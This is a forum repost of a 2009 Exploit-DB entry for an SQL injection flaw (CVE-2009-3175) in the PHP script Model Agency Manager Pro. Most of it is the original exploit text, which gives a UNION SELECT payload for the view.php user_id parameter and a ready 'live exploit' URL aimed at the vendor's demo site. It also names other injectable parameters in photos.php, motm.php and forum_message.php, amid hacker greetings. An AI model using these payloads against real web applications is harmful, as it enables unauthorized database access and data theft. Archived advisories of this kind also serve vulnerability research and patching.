Exploit Model Agency Manager Pro - 'user_id' SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
9603
Проверка EDB
  1. Пройдено
Автор
R3D-D3V!L
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2009-3175
Дата публикации
2009-09-09
Код:
[☢] ☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢{بسم الله الرØمن الرØيم}☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢
[☠]
[~] Tybe:(view.php user_id) Remote SQL Injection Vulnerability
[☠]
[~] Vendor: www.phpmodelagencyscript.com
[☠]
[☠] Software: Model Agency Manager PRO
[☠]
[☠] author: ((Ñ3d D3v!L))
[☠]
[☠] Date: 7.9.2009
[☠]
[☠] Home: CL0S3D
[☠]
[☠] contact: [email protected]
[☠]☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠{DEV!L'5 of SYST3M}☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠

[☠] Exploit:

[☠] XxX/view.php?user_id= EV!L !NJECT
[☠] (EV!L !NJ3c7):1%20union%20select%20user(),2,3,4/*&view=photos

[☠] L!VE Exploit:
http://model-agency-manager-pro.phpmodelagencyscript.com/view.php?user_id=1%20union%20select%20user(),2,3,4/*&view=photos
[☠]MORE ER0RR:
photos.php?user_id=((Ñ3d D3v!L))

motm.php?user_id=((DEV!L-Ro007))
forum_message.php?id=((STr0KE))

[☠]

N073:
REAL R3d-d3V!L !S h3R3 LAM3RZ ((☠X☠))

ARAB!AAN HAAACCKER !!

[~]-----------------------------{str0ke}-----------------------------------------------------
[~] Greetz tO: {str0ke} & DEV!L R007 & 8orn 2 K!LL & D.MODY & G0G0 & arabian hacker & EL z0hery
[~]
[~] spechial thanks : ((dolly)) & ((7am3m)) & ghost L0v3R & ۩۞۩๑ عماد ๑۩۞۩ & {0rashey}
[~]
[☠] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller
[~]
[~]!'M 4r48!4N 3xPLO!T3R
[~]
[~]--------------------------------------------------------------------------------

# milw0rm.com [2009-09-09]
 
Источник
www.exploit-db.com

Похожие темы